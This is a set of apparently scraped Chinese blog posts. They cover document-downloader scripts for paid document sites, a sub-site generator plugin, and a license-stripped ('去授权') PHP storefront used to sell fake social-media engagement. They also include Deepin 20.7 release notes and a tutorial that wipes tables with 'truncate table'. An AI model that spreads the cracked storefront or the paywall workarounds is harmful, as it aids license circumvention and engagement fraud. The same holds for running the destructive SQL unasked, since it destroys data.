安装好之后,进入到下载的代码文件里面,就可以看到py结尾的文件可以使用Python打开了,当然这里还需要下载一些依赖文件,在空白处按住Shift+鼠标右键,选择在此处打开powershell窗口。 输入 pip install -r requirements.txt 等待之后。 然后按照软件给出的帮助文档使用就行了,像是演示的这份代码也可以直接下载不要登录文件。 如果有其他文库的需求,也可以找到对应的分享,按照上面的步骤运行一下,就能使用了,像是这个叫做 多种文档下载器 的分享(地址:https://github.com/rty813/doc_downloader)。 也能下载许多文档,不过用别人分享的代码需要解决很多依赖的问题,缺少啥就装啥,像是示例这个就需要加一个:python.exe -m pip install fire。还有的是使用Chrome的ChromeDriver来控制抓取的,还有版本限制,配置起来比较糟心。 不过这种好处的方法就是,有人在GitHub分享比较新的办法的时候,可以第一时间用上,也不同太担心使用的人数太多而失效。不过一个项目火了之后还会有人打包分享的。 下载地址: 三、使用稻壳下载器 地址:http://www.daokeyuedu.com/ 除了上面那些,你还可以使用稻壳阅读器的打印PDF功能,来获取一些文档的下载。平常下载一点东西是够了。
-
-
【彩虹云商城插件】自动刷分站注册插件 把压缩包site.php上传到网站的根木录即可 使用方法:访问网址 : 域名/site.php?cronkey=你的监控密钥(必须填写)如果没有太多的需求,可以直接访问上面的访问网址就可以了。 其他参数 { num : 生成分站数量,不存在默认数量为5 power : [1 , 2] 1为普及版,2为专业版,如果值不在 1 , 2的范围内或者不存在这个参数,就会随机生成分站版本 user_suffix : 分站用户名前缀,如:值为 yunlan ,生成出来的用户名前面会加成 yunlan_随机用户名,可用于标识,不存在则为空, } 访问实例 : 域名/site.php?cronkey=123456&num=5&power=1&user_suffix=yunlan 具体生成出来的效果,自己看 ,我就不一一演示了本插件为全开源,插件闭源的几乎都是带后门,切记,切记,切记!隐藏内容,请前往内页查看详情
-
-
-
-
【PHP源码】彩虹自助下单系统官方去授权最终版源码 前言由于彩虹自助下单系统已经停止授权了,目前源码已经被公司(江苏白猿网络科技有限公司)关闭,从而停止运营。{alert type="info"}最终版彩虹代刷网,彩虹云商城,彩虹自助下单系统源码,官方去授权PHP源码。{/alert}介绍:这是最后一个彩虹自助下单系统版本了,没想到彩虹把去授权版本拿出来了,最重要的这次是官方版本源码,可放心使用。最终版彩虹代刷网,彩虹云商城,彩虹自助下单系统源码,官方去授权最终版。更新内容:{alert type="warning"}彩虹自助下单系统安装说明:上传到空间后直接访问即可根据提示安装。PHP推荐使用7.0及以上版本新增 API 接口文档1、修复无法上传 [LOGO、收款二维码] 图片资源 BUG2、修复后台配置支付接口提示地址为空的 bug3、修复无法发起支付问题4、修订版权协议V6.91.修复SQL注入漏洞2.修复后台微信QQ扫码登录V6.8.51.修复亿乐对接2.新增支持倍数输入框V6.81.更新全新的faka模板2.新增微信快捷登录3.新增批量下单功能4.防CC配置新增滑动验证码模式5.修复部分地区后台加载错误6.修复https网站对接http支付接口7.后台登录支持微信QQ扫码登录V6.7.51.修复部分对接插件2.更新数据库连接编码V6.71.对接站点功能支持插件化扩展2.新增部分常用的对接插件3.后台加款扣款支持填写备注4.新增卡密兑换商品功能5.新增异常订单自助退款功能6.对接站点支持设置备注7.优化获取全部商品列表接口性能8.faka模板增加商品搜索功能9.修复https网站无法对接的问题V6.61.新增H5商城首页+用户中心模板2.非发卡类商品支持库存数量设置3.可设置分站提现的可用提现方式4.可设置分站客服QQ全显示主站的5.修复极限验证码绕过漏洞6.修复邮件发送失败率高的问题7.修复订单高并发情况下发卡错乱的问题8.新增批量对接商品功能(仅支持同系统对接)9.优化后台提现管理页面V6.5.51.APP自助生成支持iOS2.增加独立APP下载页面3.增加商品创建时间字段4.兼容PHP8.0V6.51.增加订单状态监控功能2.增加分站APP自动生成功能3.分类商品可拖动排序4.修复部分视频链接转换失败5.可限制分站设置商品价格上限6.分站可付费自助更换域名7.优化后台商品列表显示8.优化后台订单收益计算方式9.支持PC和手机设置不同的首页模板V6.3.51.增加一个微信通知接口2.增加单独的支付订单查看页面V6.31.订单列表与导出支持根据时间搜索2.新增订单通知功能,新增微信消息通知3.增加卡易速卡盟对接4.新增工单快捷回复5.优化手机版支付宝当面付页面6.支持单独社区设置订单状态V6.2.51.新增商盟网对接2.订单列表新增一键补单按钮3.修复多个CSRF漏洞4.新增易支付列表微店官方支付宝微信二合一支付接口V6.21.优化faka模板手机版界面2.模板支持独立配置文件3.商品类型增加下单后显示固定内容4.新增配置项:只能查询本人订单、只能使用余额下单5.新增配置项:最低充值金额、允许分站修改公告6.同系统对接发卡支持库存检测7.发表文章可直接上传图片8.后台增加订单收益统计9.新增QQ互联快捷登录V6.1.51.修复对接多个易支付可能漏单的情况2.可设置支付方式选择页面提示内容V6.11.修复部分ID获取失败2.更新推广系统 支持多个商品和查询推广进度3.新增充值返现设置4.新增流量卡对接模块5.同系统对接可同步订单状态6.增加自定义代理服务器设置7.可设置登录后才能访问网站首页8.修复伪造支付回调的漏洞V6.01.更新数据库为PDO连接组件2.新增独立的文章模块,支持伪静态3.分站余额可设置仅限提成部分可提现4.新增分站提成余额延迟到账功能5.新增余额加款卡密生成6.新增员工管理,可分配不同的后台权限7.可设置商品分类地区屏蔽8.新增商品下单验证已开通服务9.易支付3种接口可分别设置对接10.全部支付接口都可在后台配置密钥11.工单可自定义问题分类支持上传图片12.新增支持卡易信商品列表获取与卡密商品对接13.优化faka首页模板,支持非卡密商品下单PHP版本: > 7.0.1{/alert}特色:{alert type="success"}去除所有授权验证支持自定义说说接口去除后台广告与更新可自定义易支付接口{/alert}安装教程:1、上传源代码到空间或服务器,并确保权限可读写。2、上传完成后,使用浏览器访问 域名/install/index.php,按照步骤流程进行安装。{alert type="error"}路径地址详情:admin (管理员后台)user (分站及用户)assets (资源文件)includes (应用程序核心文件)other (支付目录)install (程序安装)template (模板)config.php (数据库配置文件)doc.php (对接文档)Nginx静态规则: rewrite ^/api/(\w+).do/api.php?act=1 last;{/alert}特别强调{alert type="info"}1、此版本为正式免费版本,其他的均属于二次开发。2、在发布前,已和原作者联系并同意此次发布。{/alert}使用协议{alert type="info"}如果在使用过程中,出现违法违纪的情况下均与本人无关。全由使用者承担。在使用中出现问题,例如:BUG、数据泄露及丢失、入侵等安全问题,全由使用者承担。此系统仅供个人学习、研究之用,请勿用于商业用途。不提供任何技术支持。在您下载源码后视为您已经了解使用协议并知晓法律协议。{/alert}推荐兔颜易支付,让交易更有价值 : http://epay.xbyos.cn/隐藏内容,请前往内页查看详情
-
-
深度操作系统20.7正式发布 深度操作系统20.7积极响应社区用户反馈的需求,进一步提升用户体验,修复底层漏洞,新增HWE 5.18内核兼容更多硬件设备,升级Stable内核至5.15.45,提升系统稳定性和安全性!系统更新日志功能优化内核LTS内核同步上游更新至5.15.45新增HWE5.18内核兼容更多硬件设备新增对Qt6的支持控制中心新增内测功能模块,可通过图形化入口自行选择是否加入内测对输入法和键盘布局使用逻辑进行了优化,兼顾了中国用户和海外用户使用习惯时间日期新增短日期排列顺序增加启动器应的右键选中效果日历支持通用设置中的选择自动调整日视图和年视图,周一到周日的展示方式支持日视图鼠标左键选中日期并拖拽,弹出新建日程页面功能对应用默认尺寸及最小尺寸显示逻辑进行优化优化年视图灰色日期小红点显示逻辑优化年视图点击具体日期时选中效果相机新增支持MP4存储格式相册优化最小窗口分辨率至630×300像素截图录屏锁屏界面禁用文字工具、选项菜单、滚动截图、OCR、贴图、录屏下拉菜单功能邮箱新增邮箱日历功能,支持日程管理和同步新增CSV通讯录批量导入功能新增收件人预测功能新增邮件默认字体及样式配置功能拓展富文本编辑器,图文编辑、样式配置功能支持针对部分企业邮箱增加了钓鱼邮件提醒加入联系人导入导出拖拽交互,优化vcf文件字段支持优化了邮件正文的排版和展示优化邮箱删除交互优化邮箱目录加载邮件的逻辑浏览器新增Google翻译,访问英文网站时网页右键翻译功能选项任务栏右键新增,新建窗口、新建隐私窗口快捷入口优化圆角和标签栏高度全局搜索支持根据不同系统语言自动调整预置搜索引擎项默认搜索引擎可根据用户需求进行配置类目折叠按键【查看更多】支持按键操作展开其他集成nvidia-vaapi-driver库,支持在firefox浏览器下开启nvidia vaapi硬解码功能生物认证支持了更多(汇顶科技)指纹设备问题修复DDE修复部分机型UI界面显示异常问题音乐修复部分机型添加歌曲目录时,会把同级目录中的其他目录中的所有歌曲添加进来问题终端修复终端在双屏模式下拖放至横跨两个屏幕的位置,并通过ctrl+shift+?快捷键调出快捷键窗口,每次调出展示的位置会不统一问题文管修复将U盘格式化为vfat格式后,进行二次格式化此时U盘类型显示为ext3问题修复多选文件夹右键打开方式选择文件管理器打开,弹出软件包安装器界面问题修复FTP服务器里搜索不存在的文件,返回上级目录内容显示错误问题修复在设置中“磁盘图标上显示文件系统标签”项切换时,设置结果未立即生效问题修复永久删除某些文件夹,无法彻底删除且没有报错提示问题修复打开smb服务端,选择发送大文件时传输进度显示异常问题影院修复影院播放音频文件默认声音小问题修复视频文件名称上包含{}时,视频无法播放问题浏览器修复部分机型浏览器扩展程序安装出错后,弹框点击重试,刷新效果错误显示问题修复部分机型浏览器视频无法播放、网易邮箱网页加载失败修复部分机型同时打开两个浏览器窗口其中一个背景被修改问题邮箱修复邮箱新建日程时名称过长文本框展示不全问题截图录屏修复文字识别功能需要截取的图片周围大片的留白,否则会导致文字识别准确度低问题看图修复在切换及查看图片时,内存消耗持续升高,产生内存泄露问题应用商店修复英文环境下在商店进行应用更新,安装完成后弹框显示中文问题修复系统语言为西班牙语、波兰语,应用商店最小化时,应用详情页面显示异常问题控制中心对输入法快捷键设置页面文案进行修改修复控制中心搜索不支持对输入法下的三级设置项进行搜索修复部分机型系统更新时弹出输入法配置框问题修复在无焦点状态下鼠标右键点击输入法图标,输入法选中错误问题其它修复 radeon显卡终端任务栏花屏问题修复打开多个窗口连续关闭时窗管崩溃,退出特效模式后无法再次开启问题修复系统安全漏洞提升系统安全修复部分机型屏幕缩放后WINE应用托盘图标点击唤醒失败问题更新qemu解决docker-desktop运行失败问题更新flatpak解决flatpak程序在任务栏显示异常问题更新powertop 解决部分机型无法正常运行问题镜像下载官方:https://cdimage.deepin.com/relea ... nity-20.7-amd64.iso百度网盘:https://pan.baidu.com/s/1txzuwjGjns4OsNVkKdRQzg 提取码:sdsvGoogle Drive:https://drive.google.com/drive/folders/1LSJf-oXOTv6oHbz3cvCp7-M0-TXYw7LkBT:https://www.mediafire.com/folder
-
单独批量删除数据库某个数据库表中所有数据方法教程 如何单独的去批量删除数据库某个数据库表中所有数据直接使用SQL命令 业务场景:开发过程中由于历史数据造成正常的功能出错,希望在某次测试之前,执行sql 批量清空所有相关的业务数据,保留表结构。假设有表 test1、test2,sql语句放在sql文件中,直接执行即可。truncate table test1;truncate table test2;使用方法:打开数据库或者在某些程序后台找到数据库的SQL执行功能,复制truncate table (你要删除某个数据库表中数据的数据库表名); 例如truncate table test1; 然后直接执行,执行后就会直接清空你数据表中的所有数据如下图,执行了以上SQL命令 就会一次性删除你数据库某个数据库表中的所有数据。温馨提示:不是特别情况,一定要用到这个命令 不要轻易使用!!后果自负。请再测试数据库中测试后在进行实战删除。
-
花粥云商城源码分享 1.可直接串用彩虹数据 避免换程序从头再来2.硬防墙3.不需要支付认证,可直接使用安装步骤:注意:最新版需要安装php扩展安装扩展方法在下图①将源码上传至虚拟机或者服务器并解压,访问域名/install/index.php安装。②安装成功后登录后台,后台路径域名/admin,初始账号 admin,密码123456③:修改后台账号密码、支付接口以及网站等相关信息④:添加商品分类及商品进行售卖即可详细安装步骤及相关截图 已经打包至压缩包更新历史PHP最低版本要求:7.4V1.131.新增硬防墙2.高仿彩虹,他有的都有3.增加了几个对接插件v1.14 修复bug我用蓝奏云分享了[花粥云商城V1.14], 隐藏内容,请前往内页查看详情
-
-
